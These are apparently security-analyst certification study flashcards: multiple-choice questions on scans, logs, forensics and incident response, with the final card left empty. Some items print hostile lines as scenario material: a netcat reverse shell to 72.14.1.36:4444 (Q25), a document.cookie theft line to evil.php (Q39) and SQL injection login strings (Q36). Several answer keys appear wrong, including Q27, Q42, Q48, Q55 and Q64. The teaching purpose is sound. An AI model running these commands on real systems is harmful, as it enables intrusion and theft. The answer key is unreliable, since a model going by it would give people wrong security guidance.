Study Guide Flashcards

1
Q

Which of the following command line utilities would an analyst use on an end-user PC to determine the ports it is listening on?
A. tracert
B. ping
C. nslookup
D. netstat

A

netstat

2
Q

An employee has been terminated for providing company confidential information to an outside party. The employee should not have had access to this information as part of the employee's normal job function. Human resources has asked the security analyst to take possession of the computer and provide a copy of this hard drive to law enforcement, who will conduct a forensic investigation to look for information to help determine if they can bring criminal charges against the former employee. Which of the following steps should be taken when making a copy of the hard drive to provide to law enforcement?
A. Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media.
B. Degauss the hard drive and then copy to a hard drive of at least equivalent size using NTFS formatting.
C. Log onto the computer with administrator privileges, and copy the hard drive to an external storage device.
D. Provide the hard drive to law enforcement to conduct the forensic exam directly on the original hard drive.

A

A Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media

3
Q

Which of the following is a vulnerability when using Windows as a host OS for virtual machines?
A. Windows requires frequent patching.
B. Windows virtualized environments are typically unstable.
C. Windows requires hundreds of open firewall ports to operate.
D. Windows is vulnerable to the "ping of death".

A

A. Windows requires frequent patching.

4
Q

A security analyst received an alert from the antivirus software identifying a complex instance of malware on a company's network. The company does not have the resources to fully analyze the malware and determine its effect on the system. Which of the following is the BEST action to take in the incident recovery and post-incident response process?
A. Wipe hard drives, reimage the system, and return the affected systems to ready state.
B. Detect and analyze the precursors and indicators; schedule a lessons learned meeting.
C. Remove the malware and inappropriate materials; eradicate the incident.
D. Perform event correlation; create a log retention policy.

A

A Wipe hard drives, reimage the system, and return the affected systems to ready state.

5
Q

The security team has determined that the current incident response resources cannot meet management's objective to secure a forensic image for all serious security incidents within 24 hours. Which of the following compensating controls can be used to help meet management's expectations?
A. Separation of duties
B. Scheduled reviews
C. Dual control
D. Outsourcing

A

D Outsourcing

6
Q

An organization has had problems with security teams remediating vulnerabilities that are either false positives or are not applicable to the organization's servers. Management has put emphasis on security teams conducting detailed analysis and investigation before conducting any remediation. The output from a recent Apache web server scan is shown below:

Scan Host: 192.168.1.18 15-Jan-16 10:12:10.1 PDT
Vulnerability CVE-2006-5752
Cross-site scripting (XSS) vulnerability in the mod_status module of Apache server (httpd), when ExtendedStatus is enabled and a public-server-status page is used, allows remote attackers to inject arbitrary web script or HTML.
Severity: 4.3 (medium)

The team performs some investigation and finds the statement from Apache on 07/02/2008: "Fixed in Apache HTTP server 2.2.6, 2.0.61, and 1.3.39". Which of the following conditions would require the team to perform remediation on this finding?
A. The organization is running version 2.2.6 and has ExtendedStatus enabled.
B. The organization is running version 2.0.59 and is not using a public-server-status page.
C. The organization is running version 1.3.39 and is using a public-server-status page.
D. The organization is running version 2.0.5 and has ExtendedStatus enabled.

A

D The organization is running version 2.0.5 and has ExtendedStatus enabled.

7
Q

A new security manager was hired to establish a vulnerability management program. The manager asked for a corporate strategic plan and risk register that the project management office developed. The manager conducted a tools and skill sets inventory to document the plan. Which of the following is a critical task for the establishment of a successful program?
A. Establish continuous monitoring
B. Update vulnerability feed
C. Perform information classification
D. Establish corporate policy

A

B Update vulnerability feed

8
Q

Which of the following tools should an analyst use to scan for web server vulnerabilities?
A. Wireshark
B. Qualys
C. ArcSight
D. SolarWinds

A

B Qualys

9
Q

An analyst is preparing for a technical security compliance check on all Apache servers. Which of the following will be the BEST to use?
A. CIS benchmark
B. Nagios
C. Untidy
D. Cain & Abel

A

A CIS benchmark

10
Q

A technician is troubleshooting a desktop computer with low disk space. The technician reviews the following information snippets:

Disk Allocation Report
350GB - C:\user1\movies\movies

Network Stats
Proto  Local Address       Foreign Address     State
TCP    0.0.0.0:8080        0.0.0.0             LISTENING   movieDB
TCP    192.168.1.10:8080   172.16.34.77:1200   TIME_WAIT

Which of the following should the technician do to BEST resolve the issue based on the above information? (Select TWO)
A. Delete the movie\movies directory.
B. Disable the movieDB service.
C. Enable OS auto updates.
D. Install a file integrity tool.
E. Defragment the disk.

A

A Delete the movie\movies directory. B Disable the movieDB service.

11
Q

A cybersecurity analyst was asked to review web vulnerability scan logs. Given the following snippet of code:

<iframe src="http://65.240.22.1" width="0" height="0" frameborder="0" tabindex="-1" title="empty" style="visibility:hidden;display:none"></iframe>

Which of the following BEST describes the situation and recommendations to be made?
A. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The code should include the domain name. Recommend the entry be updated with the domain name.
B. The security analyst has discovered an embedded iframe that is hidden from users accessing the web page. This code is correct. This is a design preference, and no vulnerabilities are present.
C. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.
D. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. Recommend making the iframe visible. Fixing the code will correct the issue.

A

C The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.

12
Q

A cybersecurity analyst is currently auditing a new Active Directory server for compliance. The analyst uses Nessus to do the initial scan, and Nessus reports the following:

PluginID  IP             Port
10955     192.168.1.215  Microsoft-ds (445/tcp)
11210     192.168.1.215  Microsoft-ds (445/tcp)
12350     192.168.1.215  Netbus (35/udp)
12345     192.168.1.215  Ftp (21/tcp)

Which of the following critical vulnerabilities has the analyst discovered?
A. Known backdoor
B. Zero-day
C. Path disclosure
D. User enumeration

A

A Known backdoor

13
Q

Malicious users utilized brute force to access a system. An analyst is investigating these attacks and recommends methods to management that would help secure the system. Which of the following controls should the analyst recommend? (Select THREE)
A. Multifactor authentication
B. Network segmentation
C. Single sign-on
D. Encryption
E. Complexity policy
F. Biometrics
G. Obfuscation

A

A Multifactor authentication B Network segmentation E Complexity policy

14
Q

A small company is publishing a new web application to receive customer feedback related to its products. The web server will only host a form to receive customer feedback and store it in a local database. The web server is placed in a DMZ network, and the web service and file system have been hardened. However, the cybersecurity analyst discovers that data from the database can be mined over the internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database?
A. Configure the database to listen for incoming connections on the internet network.
B. Change the database connection string and apply necessary patches.
C. Configure an ACL in the border firewall to block all connections to the web server for ports different than 80 and 443.
D. Deploy a web application firewall to protect the web application from attacks to the database.

A

C Configure an ACL in the border firewall to block all connections to the web server

15
Q

A security administrator uses FTK to take an image of a hard drive that is under investigation. Which of the following processes are used to ensure the image is the same as the original disk? (Select TWO)
A. Validate the folder and file directory listings on both.
B. Check the hash value between the image and the original.
C. Boot up the image and the original system to compare.
D. Connect a write blocker to the imaging device.
E. Copy the data to a disk of the same size and manufacturer.

A

B Check the hash value between the image and the original. D Connect a write blocker to the imaging device.

16
Q

A company's IDP/DLP solution triggered the following alerts:

A. 02/25-07:16:07.294705 SSH to Non-standard Port (TCP) 245.23.123.150:51533 -> 67.178.142.153:1234
B. 02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25
C. 02/25-08:23:53.367782 Malformed DNS Packet, size exceeded (UDP) 192.168.84.150:45513 -> 172.16.32.12:53
D. 02/25-09:01:34.335672 XMAS packet detected (TCP) 192.168.233.18:61412 -> 172.16.15.233:445
E. 02/25-09:12:51.564607 Attempted FTP Connection, clear text auth (TCP) 192.168.12.45:47654 -> 172.16.222.12:21

Which of the following alerts should a security analyst investigate FIRST?
A. A
B. B
C. C
D. D
E. E

A

B

17
Q

A threat intelligence analyst who is working on the SOC floor has been forwarded an email that was sent to one of the executives in business development. The executive mentions the email was from the Chief Executive Officer (CEO), who was requesting an emergency wire transfer. This request was unprecedented. Which of the following threats MOST accurately aligns with this behavior?
A. Phishing
B. Whaling
C. Spam
D. Ransomware

A

B Whaling

18
Q

A security analyst is conducting traffic analysis and observes an HTTP POST to the company's main web server. The POST header is approximately 1000 bytes in length. During transmission, one byte is delivered every ten seconds. Which of the following attacks is the traffic indicative of?
A. Exfiltration
B. DoS
C. Buffer overflow
D. SQL injection

A

A Exfiltration

19
Q

A security analyst wants to confirm a finding from a penetration test report on the internal web server. To do so, the analyst logs into the web server using SSH to send the request locally. The report provides a link to https://hrserver.internal/../etc/paswd, and the server IP address is 10.10.10.15. However, after several attempts, the analyst cannot get the file, despite attempting to get it using different ways, as shown below:

Request                                     Response
https://hrserver.internal/../…/etc/paswd    Host not found
https://localhost/../…/etc/passwd           File not found
https://10.10.10.15/../…/etc/passwd         File not found

Which of the following would explain this problem? (Select TWO)
A. The web server uses SNI to check for a domain name.
B. Requests can only be sent remotely to the web server.
C. There is no local name resolution for hrserver.internal.
D. The password file is write protected.
E. The web server has not started.

A

A. The web server uses SNI to check for a domain name. C. There is no local name resolution for hrserver.internal.

20
Q

A SIEM alert occurs with the following output:

MAC                IP             Duration  Logged on
01:23:45:33:89:cc  192.168.122.3  15 hours  Yes
01:23:45:33:89:cc  192.168.122.9  4 days    Yes

Which of the following BEST describes this alert?
A. The alert is a positive; there is a device with dual NICs.
B. The alert is valid because IP spoofing may be occurring on the network.
C. The alert is a false positive; both NICs are of the same brand.
D. The alert is valid because there may be a rogue device on the network.

A

D. The alert is valid because there may be a rogue device on the network.

21
Q

A company provides wireless connectivity to the internal network from all physical locations for company-owned devices. Users were able to connect the day before, but now all users have reported that when they connect to an access point in the conference room, they cannot access company resources. Which of the following BEST describes the cause of the problem?
A. The access point is blocking access by MAC address. Disable MAC address filtering.
B. The network is not available. Escalate the issue to network support.
C. Expired DNS entries exist on users' devices. Request the affected users perform a DNS flush.
D. The access point is a rogue device. Follow incident response procedures.

A

D The access point is a rogue device. Follow incident response procedures.

22
Q

An application contains the following log entries in a file named "authlog.log":

User 'oidc-provider-fb:john' successfully logged in 2016-01-01 23:00:01
User 'local:Administrator' successfully logged out 2016-01-01 23:00:05
User 'oidc-provider-fb:kate' successfully logged out 2016-01-01 23:00:07

A security analyst has been asked to parse the log file and print out all valid usernames. Which of the following achieves this task?
A. grep -e "successfully" authlog.log | awk '{print $2}' | sed s/\'//g
B. cat authlog.log | grep "2016-01-01" | echo "valid username found: $2"
C. echo authlog.log > sed 's/User//' | print "username exists: $user"
D. cat "authlog.log" | grep "User" | cut -F' ' | "username exists: $1"

A

A. grep -e "successfully" authlog.log | awk '{print $2}' | sed s/\'//g

23
Q

An organization has two environments: development and production. Development is where applications are developed with unit testing. The development environment has many configuration differences from the production environment. All applications are hosted on virtual machines. Vulnerability scans are performed against all systems before and after any application or configuration changes to any environment. Lately, vulnerability remediation activity has caused production applications to crash and behave unpredictably. Which of the following changes should be made to the current vulnerability management process?
A. Create a third environment between development and production that mirrors production and tests all changes before deployment to the user.
B. Refine testing in the development environment to include fuzzing and user acceptance testing so applications are more stable before they migrate to production.
C. Create a second production environment by cloning the virtual machines, and if any stability problems occur, migrate users to the alternate production environment.
D. Refine testing in the production environment to include more exhaustive application stability testing while continuing to maintain the robust vulnerability remediation activities.

A

A Create a third environment between development and production that mirrors production and tests all changes before deployment to the user.

24
Q

When reviewing the system log, the cybersecurity analyst noticed a suspicious log entry:

wmic /node:HRDepartment1 computersystem get username

Which of the following combinations describes what occurred, and what action should be taken in this situation?
A. A rogue user has queried for users logged in remotely. Disable local access to network shares.
B. A rogue user has queried for the administrator logged into the system. Attempt to determine who executed the command.
C. A rogue user has queried for the administrator logged into the system. Disable local access to the cmd prompt.
D. A rogue user has queried for users logged in remotely. Attempt to determine who executed the command.

A

D. A rogue user has queried for users logged in remotely. Attempt to determine who executed the command.

25
Q

A security analyst is investigating the possible compromise of a production server for the company's public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:

+ Server: nginx/1.4.6 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-c all' to force check all the possible dirs)
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ "Robots.txt" contains two entries that should be manually viewed.

In some of the portal's startup command files, the following command appears:

nc -e /bin/sh 72.14.1.36 4444

Investigating further, the analyst runs netstat and obtains the following output:

# netstat -an
Active Internet connections (servers and established)
Proto  Recv-Q  Send-Q  Local Address  Foreign Address   State
tcp    0       0       *:443          *:*               LISTEN
tcp    0       52      *:59482        72.14.1.36:4444   ESTABLISHED
tcp    0       0       *:80           *:*               LISTEN

Which of the following is the best step for the analyst to take NEXT?
A. Initiate the security incident response process.
B. Recommend training to avoid mistakes in production command files.
C. Delete the unknown files from the production servers.
D. Patch a new vulnerability that has been discovered.
E. Manually review the robots.txt file for errors.

A

A Initiate the security incident response process.

26
Q

A cybersecurity analyst wants to use a tool that prevents vulnerabilities in software from being successfully exploited. Which of the following tools can be implemented to achieve this goal?
A. HIPS
B. EMET
C. Helix
D. Nessus

A

A HIPS

27
Q

Which of the following utilities could be used to resolve an IP address to a domain name, assuming the address has a PTR record?
A. ifconfig
B. ping
C. arp
D. nbtstat

A

B ping

28
Q

Which of the following describes why it is important for an organization's incident response team and legal department to meet and discuss communication processes during the incident response process?
A. To comply with existing organization policies and procedures on interacting with internal and external parties.
B. To ensure all parties know their roles and effective lines of communication are established.
C. To identify which group will communicate details to law enforcement in the event of a security incident.
D. To predetermine what details should or should not be shared with internal or external parties in the event of an incident.

A

B. To ensure all parties know their roles and effective lines of communication are established.

29
Q

During a physical penetration test at a client site, a local law enforcement officer stumbled upon the test and questioned the legitimacy of the team. Which of the following information should be shown to the officer?
A. Letter of engagement
B. Scope of work
C. Timing information
D. Team reporting

A

B Scope of work

30
Q

A security administrator recently deployed a virtual honeynet. The honeynet is not protected by the company's firewall, while all production networks are protected by a stateful firewall. Which of the following would BEST allow an external penetration tester to determine which one is the honeynet's network?
A. Banner grab
B. Packet analyzer
C. Fuzzer
D. TCP ACK scan

A

D TCP ACK scan

31
Q

A security analyst is reviewing a report from the networking department that describes an increase in network utilization, which is causing network performance issues on some systems. A top talkers report over a five-minute sample is included.

Source         Destination    Application  Packets  Volume (kbps)
8.4.4.100      172.16.1.25    SMTP         4386     6141
96.23.114.14   172.16.1.1     ITSec        7734     10827
172.16.1.101   100.15.25.34   HTTP         3412     4776
96.23.114.18   172.16.1.1     IPSec        2723     3812
172.16.1.101   100.15.25.34   SSL          8697     12176
172.16.1.222   203.67.121.12  Quicktime    1302     1822
172.16.1.197   113.121.12.15  8180/tcp     6045     8463
172.16.1.131   172.16.1.67    DHCP         25       35
172.16.1.25    172.16.1.53    DNS          66       93

Given the above output of the sample, which of the following should the security analyst accomplish FIRST to help track down the performance issues?
A. Perform a reverse lookup on each of the IP addresses listed to help determine if the traffic is necessary.
B. Recommend that networking block the unneeded protocols such as Quicktime to clear up some of the congestion.
C. Put ACLs in place to restrict traffic destined for random or non-default application ports.
D. Quarantine the top talker on the network and begin to investigate any potential threats caused by the excessive traffic.

A

C Put ACLs in place to restrict traffic destined for random or non-default application ports.

32
Q

During a quarterly review of user accounts and activity, a security analyst noticed that after a password reset the head of human resources has been logging in from multiple external locations, including several overseas. Further review of the account showed access rights to a number of corporate applications, including a sensitive accounting application used for employee bonuses. Which of the following security methods could be used to mitigate this risk?
A. RADIUS identity management
B. Context-based authentication
C. Privilege escalation restrictions
D. Elimination of self-service password resets

A

B Context-based authentication

33
Q

On which of the following organizational resources is the lack of an enabled password or PIN a common vulnerability?
A. VDI systems
B. Mobile devices
C. Enterprise server OSs
D. VPNs
E. VoIP phones

A

B. Mobile devices

34
Q

A security analyst has performed various scans and found vulnerabilities in several applications that affect production data. Remediation of all exploits may cause certain applications to no longer work. Which of the following activities would need to be conducted BEFORE remediation?
A. Fuzzing
B. Input validation
C. Change control
D. Sandboxing

A

C Change control

35
Q

The SOC shift supervisor is looking through the administrator access logs for the key network devices. The supervisor notices there are no administrative access entries for the previous day, but knows IOS upgrades were scheduled on key network devices, according to the change control board notifications from the last shift logs. Which of the following is the MOST likely cause?
A. Someone cleared the log files to cover malicious activity.
B. Updates and upgrades were pushed out to a later date.
C. SNMP community strings were changed in the upgrade process.
D. There were issues aggregating the individual log files into the administrator access logs.

A

A Someone cleared the log files to cover malicious activity.

36
Q

A cybersecurity analyst is currently using Nessus to scan several FTP servers. Upon receiving the results of the scan, the analyst needs to further test to verify that the vulnerability found exists. The analyst uses the following snippet of code:

Username: admin ' ; --
Password: ' OR 1=1 --

Which of the following vulnerabilities is the analyst checking for?
A. Buffer overflow
B. SQL injection
C. Default password
D. Format string attack

A

B SQL injection

37
Q

The Chief Information Security Officer (CISO) has decided that all accounts with elevated privileges must use a longer, more complicated passphrase instead of a password. The CISO would like to formally document management's intent to set this control level. Which of the following is the appropriate means to achieve this?
A. A control
B. A standard
C. A policy
D. A guideline

A

C - A policy

38
Q

An analyst suspects a large database that contains customer information and credit card data was exfiltrated to a known hacker group in a foreign country. Which of the following incident response steps should the analyst take FIRST?
A. Immediately notify law enforcement, as they may be able to help track down the hacker group before customer information is disseminated.
B. Draft and publish a notice on the company's website about the incident, as PCI regulations require immediate disclosure in the case of a breach of PII or card data.
C. Isolate the server, restore the database to a time before the vulnerability occurred, and ensure the database is encrypted.
D. Document and verify all evidence and immediately notify the company's Chief Information Security Officer (CISO) to better understand the next steps.

A

D Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

39
Q

Given the following code:

var adr = '../evil.php?breadomonster=' + escape(document.cookie);
var query = "SELECT * FROM users WHERE name='smith'";

Which of the following types of attacks is occurring?
A. Privilege escalation
B. XSS
C. Session hijacking
D. MITM
E. SQL injection

A

B XSS

40
Q

Which of the following should be used to correlate multiple events from different regions, time zones, and time periods?
A. Snort
B. ArcSight
C. Imperva
D. Nessus

A

B Arcsight

41
Q

A security analyst is running a penetration test against a client's external firewall. The analyst runs an attack that attempts to flood the firewall from multiple locations while denying access to others. Which of the following attacks did the analyst perform?
A. Fuzzing
B. DDoS
C. Ping of death
D. MITM

A

B DDoS

42
Q

A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usage, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, despite the fact that no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this?
A. Advanced persistent threat
B. Zero day
C. Trojan
D. Logic bomb

A

B Zero day

43
Q

A technician receives an alert indicating an endpoint is beaconing to a suspect dynamic DNS domain. Which of the following countermeasures should be used to BEST protect the network in response to this alert? (Select TWO)
A. Set up a sinkhole for that dynamic DNS domain to prevent communication.
B. Isolate the infected endpoint to prevent the potential spread of malicious activity.
C. Implement an internal honeypot to catch the malicious traffic and trace it.
D. Perform a risk assessment and implement compensating controls.
E. Ensure the IDS is active on the network segment where the endpoint resides.

A

A Set up a sinkhole for that dynamic DNS domain to prevent communication. B Isolate the infected endpoint to prevent the potential spread of malicious activity.

44
Q

After a review of user account activity, it appears certain user accounts were being used to access critical systems that are unrelated to the users' roles and responsibilities. The user accounts in question were disabled, but then other user accounts were used to perform the same activity soon after. Which of the following is the BEST remediation to stop this violation?
A. Reconfigure RADIUS.
B. Implement MFA.
C. Upgrade to the latest TLS.
D. Salt password hashes.

A

B Implement MFA.

45
Q

A company installed a wireless network more than a year ago, standardizing on the same model APs in a single subnet. Recently, several users have reported timeouts and connection issues with Internet browsing. The security administrator has gathered some information about the network to try to recreate the issues with the assistance of a user. The administrator is able to ping every device on the network and confirms that the network is very slow.

Administrator's PC: 192.168.1.20
User's PC: 192.168.1.22
AP-Finance: 192.168.1.10
AP-Workshop: 192.168.1.11
AP-Lounge: 192.168.1.12
AP-Reception: 192.168.1.13
AP-Warehouse: 192.168.1.14
AP-IT: 192.168.1.15

Output
Interface: 192.168.1.20 --- 0xf
  Internet Address  Physical Address   Type
  192.168.1.4       1a-25-0d-df-c6-27  dynamic
  192.168.1.5       1a-25-0d-df-c8-00  dynamic
  192.168.1.10      00-dc-3b-67-81-1a  dynamic
  192.168.1.11      c4-02-03-a1-4a-01  dynamic
  192.168.1.12      00-dc-3b-67-82-02  dynamic
  192.168.1.13      00-dc-3b-a5-ba-0b  dynamic
  192.168.1.14      00-dc-3b-67-88-07  dynamic
  192.168.1.15      00-dc-3b-67-80-0a  dynamic
  192.168.1.20      1a-25-0d-df-8d-82  dynamic
  192.168.1.22      1a-25-0d-df-89-cb  dynamic

Given the above result, which of the following should the administrator investigate FIRST?
A. The AP-Workshop device
B. The AP-Reception device
C. The device at 192.168.1.4
D. The AP-IT device
E. The user's PC

A

A The AP-Workshop device

46
Q

A security analyst's daily review of system logs and SIEM showed fluctuating patterns of latency. During the analysis, the analyst discovered recent attempts of intrusion related to malware that overwrites the MBR. The facilities manager informed the analyst that a nearby construction project damaged the primary power lines, impacting the analyst's support systems. The electric company has temporarily restored power, but the area may experience temporary outages. Which of the following issues should the analyst focus on to continue operations?
A. Updating the ACL
B. Conducting backups
C. Virus scanning
D. Additional log analysis

A

B Conducting backups

47
Q

In comparison to non-industrial IT vendors, ICS equipment vendors generally: A Rely less on proprietary code in their hardware products. B Have more mature software development models. C Release software updates less frequently. D Provide more extensive vulnerability reporting.

A

C Release software updates less frequently.

48
Q

During routine network reconnaissance that is looking for unused but open ports, a company’s scans generate the following packet captures:

132 17.816492 192.168.1.132 192.168.1.1 TCP 58 49151 -> 22 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
133 17.816942 192.168.1.132 192.168.1.1 TCP 58 49151 -> 445 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
134 17.818683 192.168.1.1 192.168.1.132 TCP 58 22 -> 49151 [SYN, ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1460
135 17.819546 192.168.1.132 192.168.1.1 TCP 58 49151 -> 80 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
136 17.824887 192.168.1.1 192.168.1.132 TCP 54 445 -> 49151 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
137 17.829763 192.168.1.1 192.168.1.132 TCP 54 80 -> 49151 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
138 22.063352 192.168.1.1 192.168.1.132 TCP 58 [TCP Retransmission] 22 -> 49151 [SYN, ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1460

Which of the following is the BEST reason for the retransmission in packet 138? A Port 22 is closed, and 192.168.1.1 is attempting to complete the closure. B Port 22 is open, and 192.168.1.132 is attempting to continue the handshake. C Port 22 is closed, and 192.168.1.132 is attempting to complete the closure. D Port 22 is open, and 192.168.1.1 is attempting to continue the handshake.

A

B Port 22 is open, and 192.168.1.132 is attempting to continue the handshake.

49
Q

An organization has a policy prohibiting remote administration of servers where web services are running. One of the Nmap scans is shown here:

Starting Nmap 4.67 (http://nmap.org) at 2011-11-03 18:32 EDT
Nmap scan report for 192.168.1.13
Host is up (0.00066s latency).
Not shown: 992 closed ports
PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
111/tcp   open   rpcbind
139/tcp   open   netbios-ssn
3306/tcp  open   mysql
MAC Address: 01:AA:FB:23:21:45
Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds

Given the organization’s policy, which of the following services should be disabled on this server? A rpcbind B netbios-ssn C mysql D ssh E telnet

A

D ssh

50
Q

A system’s authority to operate (ATO) is set to expire in four days. Because of other activities and limited staffing, the organization has neglected to start reauthorization activities until now. The cybersecurity group just performed a vulnerability scan with the partial set of results shown below.

Scan Host: 192.168.1.13 15-Jan-16 08:12:10.1 EDT
Vulnerability CVE-2015-1635
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows Server 2012 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka “HTTP.sys remote code execution vulnerability”
Severity: 10.0 (high)
Expected Result: enforceHTTPValidation=’enabled’;
Current Value: enforceHTTPValidatoin=enabled;
Evidence: C:\8system8\windows\config\web.config

A Remediate by going to the web.config file, searching for the enforce HTTP validation setting, and manually updating it to the correct value. B Accept this risk for now because this is a “high” severity, but testing will require more than the four days available, and the system ATO needs to be completed. C Ignore it. This is a false positive, and the organization needs to focus its efforts on other findings. D Ensure HTTP validation is enabled by rebooting the server.

A

A Remediate by going to the web.config file, searching for the enforce HTTP validation

51
Q

A security administrator has uncovered a covert channel used to exfiltrate confidential data from an internal database server through a compromised corporate web server. Ongoing exfiltration is accomplished by embedding a small amount of data extracted from the database into the metadata of images served by the web server. File timestamps suggest that the server was initially compromised six months ago using a common server misconfiguration. Which of the following BEST describes the type of threat being used? A APT B Zero-day attack C Man-in-the-middle attack D XSS

A

A APT

52
Q

A security analyst has been asked to scan a subnet. During the scan, the following output was generated.

[root@scanbox-]# nmap 192.168.100.*
Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2015-10-10 19:10 EST
Interesting ports on purple.company.net (192.168.100.145):
Not shown: 1677 closed ports
PORT     STATE  SERVICE
22/tcp   open   ssh
53/tcp   open   domain
111/tcp  open   rpcbind
Interesting ports on lemonyellow.company.net (192.168.100.214):
Not shown: 1676 closed ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
111/tcp  open   rpcbind
443/tcp  open   ssl/http
Nmap finished: 256 IP addresses (2 hosts up) scanned in 7.223 seconds

Based on the output above, which of the following is MOST likely? A 192.168.100.214 is a secure FTP server. B 192.168.100.214 is a web server. C Both hosts are mail servers. D 192.168.100.145 is a DNS server.

A

B 192.168.100.214 is a web server.

53
Q

A security analyst’s company uses RADIUS to support a remote sales staff of more than 700 people. The Chief Information Security Officer (CISO) asked to have IPSec using ESP and 3DES enabled to ensure the confidentiality of the communication as per RFC 3162. After the implementation was complete, many sales users reported latency issues and other performance issues when attempting to connect remotely. Which of the following is occurring? A The device running RADIUS lacks sufficient RAM and processing power to handle ESP implementation. B RFC 3162 is known to cause significant performance problems. C The IPSec implementation has significantly increased the amount of bandwidth needed. D The implementation should have used AES instead of 3DES.

A

A The device running RADIUS lacks sufficient RAM and processing power to handle ESP implementation.

54
Q

A company uses a managed IDS system, and a security analyst has noticed a large volume of brute force password attacks originating from a single IP address. The analyst put in a ticket with the IDS provider, but no action was taken for 24 hours, and the attacks continued. Which of the following would be the BEST approach for the scenario described? A Draft a new MOU to include response incentive fees. B Reengineer the BPA to meet the organization’s needs. C Modify the SLA to support organizational requirements. D Implement an MOA to improve vendor responsiveness.

A

A Draft a new MOU to include response incentive fees.

55
Q

The help desk has reported that users are reusing previous passwords when prompted to change them. Which of the following would be the MOST appropriate controls for the security analyst to configure to prevent password reuse? (Select TWO) A Implement mandatory access control on all workstations. B Implement role-based access control within directory services. C Deploy Group Policy Objects to domain resources. D Implement scripts to automate the configuration of PAM on Linux hosts. E Deploy a single sign-on solution for both Windows and Linux hosts.

A

B Implement role-based access control within directory services. C Deploy Group Policy Objects to domain resources.

56
Q

A company has a popular shopping cart website hosted in several geographically diverse locations. The company has started hosting static content on a content delivery network (CDN) to improve performance. The CDN provider has reported the company is occasionally sending attack traffic to other CDN-hosted targets. Which of the following has MOST likely occurred? A The CDN provider has mistakenly performed a GeoIP mapping to the company. B The CDN provider has misclassified the network traffic as hostile. C A vulnerability scan has not been tuned to exclude web assets hosted by the CDN. D The company has been breached, and customer PII is being exfiltrated to the CDN.

A

C A vulnerability scan has not been tuned to exclude web assets hosted by the CDN.

57
Q

A vulnerability scan came back with critical findings for a Microsoft SharePoint server.

Vulnerable software installed: Office 2007
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000021096F0100000100000000F01FEC\InstallProperties - key exists
The Office component Microsoft Office Excel Services Web Front End Components is running an affected version - 12.0.6612.1000

Which of the following actions should be taken? A Remove Microsoft Office from the server. B Document the finding as an exception. C Install a newer version of Microsoft Office on the server. D Patch Microsoft Office on the server.

A

C Install a newer version of Microsoft Office on the server.

58
Q

A vulnerability scan report shows a vulnerable version of Apache on a Linux server. The analyst validates the version by retrieving the server’s banner. The server’s administrator verifies that all available updates have been installed, but an attempt to exploit the vulnerability fails. Which of the following MOST likely occurred? A The vulnerability scanner is unable to properly establish a connection to the server. B The scanner agent was improperly installed. C The Apache server was patched before the scan was completed. D The package manager includes backported versions of Apache.

A

D The package manager includes backported versions of Apache.

59
Q

Which of the following organizations would have to remediate embedded controller vulnerabilities? A Banking institutions B Public universities C Regulatory agencies D Hydroelectric facilities

A

D Hydroelectric facilities

60
Q

Which of the following is a security concern found PRIMARILY in virtual infrastructure? A Two-factor authentication for network resources B Physical hardware supporting multitenancy C Airgapped system that will not run on the hypervisor D User access to outside resources

A

B Physical hardware supporting multitenancy

61
Q

A security analyst is assisting in the redesign of a network to make it more secure. The solution should be low cost, and access to the secure segments should be easily monitored, secured, and controlled. Which of the following should be implemented? A System isolation B Honeypot C Jump box D Mandatory access control

A

C Jump box

62
Q

Which of the following BEST describes why vulnerabilities found in ICS and SCADA can be difficult to remediate? A ICS/SCADA systems are not supported by the CVE publications. B ICS/SCADA system rarely have full security functionality. C ICS/SCADA systems do not allow remote connections. D ICS/SCADA systems use encrypted traffic to communicate between devices.

A

B ICS/SCADA system rarely have full security functionality.

63
Q

A security engineer has been asked to reduce the attack surface on an organization’s production environment. To limit access, direct VPN access to all systems must be terminated, and users must utilize multifactor authentication to access a constrained VPN connection and then pivot to other production systems from a bastion host. The MOST appropriate way to implement the stated requirement is through the use of a: A sinkhole. B multitenant platform. C single-tenant platform. D jump box.

A

D jump box.

64
Q

In the development stage of the incident response policy, the security analyst needs to determine the stakeholders for the policy. Which of the following would be the policy stakeholders? A Human resources, legal, public relations, management B Chief Information Officer (CIO), Chief Executive Officer (CEO), board of directors, stockholders C IT, human resources, security administrator, finance D Public information officer, human resources, audit, customer service

A

B Chief Information Officer (CIO), Chief Executive Officer (CEO), board of directors, stockholders

65
Q

